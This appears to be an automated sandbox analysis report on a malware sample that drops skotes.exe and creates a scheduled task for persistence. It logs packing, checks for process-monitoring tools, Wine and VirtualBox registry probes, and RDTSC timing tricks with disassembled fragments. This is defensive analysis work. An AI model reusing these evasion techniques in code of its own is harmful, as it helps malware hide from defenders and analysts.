Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Dl6wuWiQdg.exe

Static file information: File size 1868288 > 1048576

Source: Dl6wuWiQdg.exe

Static PE information: Raw size of ffxetdru is bigger than: 0x100000 < 0x19e400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Unpacked PE file: 0.2.Dl6wuWiQdg.exe.d90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ffxetdru:EW;yccyqbqs:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ffxetdru:EW;yccyqbqs:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Unpacked PE file: 5.2.8WYS1MQTL0QCOHKIPL8.exe.d50000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.780000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 7.2.skotes.exe.780000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 9.2.skotes.exe.780000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: skotes.exe.5.dr	Static PE information: real checksum: 0x31d37e should be: 0x3239b2
Source: 8WYS1MQTL0QCOHKIPL8.exe.0.dr	Static PE information: real checksum: 0x31d37e should be: 0x3239b2
Source: Dl6wuWiQdg.exe	Static PE information: real checksum: 0x1d7315 should be: 0x1c9e34

Source: Dl6wuWiQdg.exe	Static PE information: section name:
Source: Dl6wuWiQdg.exe	Static PE information: section name: .idata
Source: Dl6wuWiQdg.exe	Static PE information: section name:
Source: Dl6wuWiQdg.exe	Static PE information: section name: ffxetdru
Source: Dl6wuWiQdg.exe	Static PE information: section name: yccyqbqs
Source: Dl6wuWiQdg.exe	Static PE information: section name: .taggant
Source: 8WYS1MQTL0QCOHKIPL8.exe.0.dr	Static PE information: section name:
Source: 8WYS1MQTL0QCOHKIPL8.exe.0.dr	Static PE information: section name: .idata
Source: 8WYS1MQTL0QCOHKIPL8.exe.0.dr	Static PE information: section name: tezivoqu
Source: 8WYS1MQTL0QCOHKIPL8.exe.0.dr	Static PE information: section name: tcaewlrx
Source: 8WYS1MQTL0QCOHKIPL8.exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.5.dr	Static PE information: section name:
Source: skotes.exe.5.dr	Static PE information: section name: .idata
Source: skotes.exe.5.dr	Static PE information: section name: tezivoqu
Source: skotes.exe.5.dr	Static PE information: section name: tcaewlrx
Source: skotes.exe.5.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Code function: 5_2_00D6D91C push ecx; ret	5_2_00D6D92F
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Code function: 5_2_00D61359 push es; ret	5_2_00D6135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0079D91C push ecx; ret	6_2_0079D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_0079D91C push ecx; ret	7_2_0079D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_00989680 push 37530E9Ch; mov dword ptr [esp], ebp	9_2_009896AC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_0079D91C push ecx; ret	9_2_0079D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_0079DFC6 push ecx; ret	9_2_0079DFD9

Source: Dl6wuWiQdg.exe	Static PE information: section name: entropy: 7.983145979605079
Source: Dl6wuWiQdg.exe	Static PE information: section name: ffxetdru entropy: 7.953108190155835
Source: 8WYS1MQTL0QCOHKIPL8.exe.0.dr	Static PE information: section name: entropy: 7.138645527976382
Source: skotes.exe.5.dr	Static PE information: section name: entropy: 7.138645527976382

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File created: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe			Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_6-9722
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_5-10749

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: DE937E second address: DE8C4A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F36B8869BFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b stc 0x0000000c pushad 0x0000000d xor ebx, dword ptr [ebp+122D2CF3h] 0x00000013 pushad 0x00000014 mov dword ptr [ebp+122D29CFh], ecx 0x0000001a jmp 00007F36B8869C08h 0x0000001f popad 0x00000020 popad 0x00000021 push dword ptr [ebp+122D0E79h] 0x00000027 jnc 00007F36B8869C00h 0x0000002d call dword ptr [ebp+122D1BAAh] 0x00000033 pushad 0x00000034 pushad 0x00000035 cld 0x00000036 or dh, FFFFFFB5h 0x00000039 popad 0x0000003a xor eax, eax 0x0000003c jmp 00007F36B8869C08h 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 cld 0x00000046 mov dword ptr [ebp+122D2B07h], eax 0x0000004c jmp 00007F36B8869C09h 0x00000051 mov esi, 0000003Ch 0x00000056 xor dword ptr [ebp+122D27A0h], ecx 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 ja 00007F36B8869BFEh 0x00000066 lodsw 0x00000068 jmp 00007F36B8869C09h 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jmp 00007F36B8869BFFh 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a jmp 00007F36B8869C00h 0x0000007f nop 0x00000080 push edi 0x00000081 jnc 00007F36B8869BF8h 0x00000087 pop edi 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b pushad 0x0000008c pushad 0x0000008d popad 0x0000008e jp 00007F36B8869BF6h 0x00000094 popad 0x00000095 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F68F2F second address: F68F37 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F54CE2 second address: F54D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F36B8869C07h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F54D05 second address: F54D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F54D09 second address: F54D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F36B8869BFCh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F54D21 second address: F54D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F54D25 second address: F54D33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F54D33 second address: F54D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jbe 00007F36B8D8D086h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F68251 second address: F68261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F68261 second address: F68266 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F68266 second address: F6827E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F36B8869BFAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F6827E second address: F68282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F68282 second address: F68288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F6BCE1 second address: F6BDC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 jmp 00007F36B8D8D099h 0x00000015 pop eax 0x00000016 pushad 0x00000017 ja 00007F36B8D8D086h 0x0000001d jmp 00007F36B8D8D099h 0x00000022 popad 0x00000023 popad 0x00000024 nop 0x00000025 push 00000000h 0x00000027 jmp 00007F36B8D8D094h 0x0000002c call 00007F36B8D8D089h 0x00000031 pushad 0x00000032 jmp 00007F36B8D8D092h 0x00000037 jmp 00007F36B8D8D08Eh 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007F36B8D8D08Bh 0x00000043 mov eax, dword ptr [esp+04h] 0x00000047 jc 00007F36B8D8D0A1h 0x0000004d mov eax, dword ptr [eax] 0x0000004f jng 00007F36B8D8D092h 0x00000055 jno 00007F36B8D8D08Ch 0x0000005b mov dword ptr [esp+04h], eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F36B8D8D08Bh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F6BDC5 second address: F6BDCF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F36B8869BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F6BDCF second address: F6BE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 and esi, 6B5CC3F8h 0x0000000d sub dword ptr [ebp+122D2286h], ecx 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F36B8D8D088h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D2A09h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F36B8D8D088h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 mov di, 050Bh 0x00000055 push 00000003h 0x00000057 sub dword ptr [ebp+122D2286h], ecx 0x0000005d call 00007F36B8D8D089h 0x00000062 push esi 0x00000063 pushad 0x00000064 jc 00007F36B8D8D086h 0x0000006a ja 00007F36B8D8D086h 0x00000070 popad 0x00000071 pop esi 0x00000072 push eax 0x00000073 jmp 00007F36B8D8D08Fh 0x00000078 mov eax, dword ptr [esp+04h] 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F36B8D8D097h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F6BE7D second address: F6BE82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F6BE82 second address: F6BE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F36B8D8D086h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jl 00007F36B8D8D094h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F6BF31 second address: F6BF5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jne 00007F36B8869BF6h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D27A0h], edi 0x00000017 push A6F0F661h 0x0000001c je 00007F36B8869C04h 0x00000022 push eax 0x00000023 push edx 0x00000024 jp 00007F36B8869BF6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F6C088 second address: F6C08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F6C08D second address: F6C168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D2BFBh] 0x00000012 push 00000000h 0x00000014 mov edx, dword ptr [ebp+122D2AF3h] 0x0000001a push EC9B869Eh 0x0000001f jnp 00007F36B8869BFEh 0x00000025 add dword ptr [esp], 136479E2h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F36B8869BF8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D27A0h], eax 0x0000004c push 00000003h 0x0000004e call 00007F36B8869BFBh 0x00000053 xor dword ptr [ebp+122D183Dh], esi 0x00000059 pop ecx 0x0000005a push 00000000h 0x0000005c call 00007F36B8869BFBh 0x00000061 mov di, bx 0x00000064 pop esi 0x00000065 push 00000003h 0x00000067 stc 0x00000068 push 90C3714Dh 0x0000006d push esi 0x0000006e push ecx 0x0000006f jmp 00007F36B8869C05h 0x00000074 pop ecx 0x00000075 pop esi 0x00000076 add dword ptr [esp], 2F3C8EB3h 0x0000007d jl 00007F36B8869BFCh 0x00000083 lea ebx, dword ptr [ebp+12456BDDh] 0x00000089 or dword ptr [ebp+122D2252h], esi 0x0000008f push eax 0x00000090 push eax 0x00000091 push edx 0x00000092 jnl 00007F36B8869BF8h 0x00000098 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8AFFC second address: F8B004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8B45A second address: F8B469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F36B8869BF6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8B469 second address: F8B477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F36B8D8D086h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8B477 second address: F8B47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8B47B second address: F8B48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F36B8D8D086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
